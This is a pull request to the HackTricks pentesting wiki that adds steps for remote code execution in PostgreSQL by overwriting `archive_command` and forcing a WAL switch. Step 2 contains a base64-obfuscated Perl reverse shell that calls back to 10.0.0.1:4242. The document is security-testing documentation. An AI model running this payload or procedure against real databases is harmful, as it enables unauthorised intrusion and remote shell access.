### PR TITLE
Add archive_command to "PostgreSQL configuration file RCE" section

### DIFF
--- a/network-services-pentesting/pentesting-postgresql.md
+++ b/network-services-pentesting/pentesting-postgresql.md
@@ -385,6 +385,8 @@ The **configuration file** of postgresql is **writable** by the **postgres user*
 
 ![](<../.gitbook/assets/image (303).png>)
 
+#### **RCE with ssl_passphrase_command**
+
 The configuration file have some interesting attributes that can lead to RCE:
 
 * `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` Path to the private key of the database
@@ -406,6 +408,20 @@ Then, an attacker will need to:
 While testing this I noticed that this will only work if the **private key file has privileges 640**, it's **owned by root** and by the **group ssl-cert or postgres** (so the postgres user can read it), and is placed in _/var/lib/postgresql/12/main_.
 
 **More** [**information about this technique here**](https://pulsesecurity.co.nz/articles/postgres-sqli)**.**
+
+#### **RCE with archive_command**
+
+Another attribute in the configuration file that is exploitable is `archive_command`.
+
+For this to work, the `archive_mode` setting has to be `'on'` or `'always'`. If that is true, then we could overwrite the command in `archive_command` and force it to execute via the WAL (write-ahead logging) operations.
+
+The general steps are:
+1. Check whether archive mode is enabled: `SELECT current_setting('archive_mode')`
+2. Overwrite `archive_command` with the payload. For eg, a reverse shell: `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'`
+3. Reload the config: `SELECT pg_reload_conf()`
+4. Force the WAL operation to run, which will call the archive command: `SELECT pg_switch_wal()` or `SELECT pg_switch_xlog()` for some Postgres versions
+
+**More** [**information about this config and about WAL here**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**.**
 
 ## **Postgres Privesc**
 


### PR DESCRIPTION
Among the PostgreSQL configuration file attributes, the `archive_command` is also potentially exploitable. Add some how-steps in the style of the existing, similar section on `ssl_passphrase_command`.

This PR also:
- Moves the `ssl_passphrase_command` into a sub-section and adds a header

Note to reviewers: this is my first PR to HackTricks, please feel free to point out if I'm not following the correct conventions!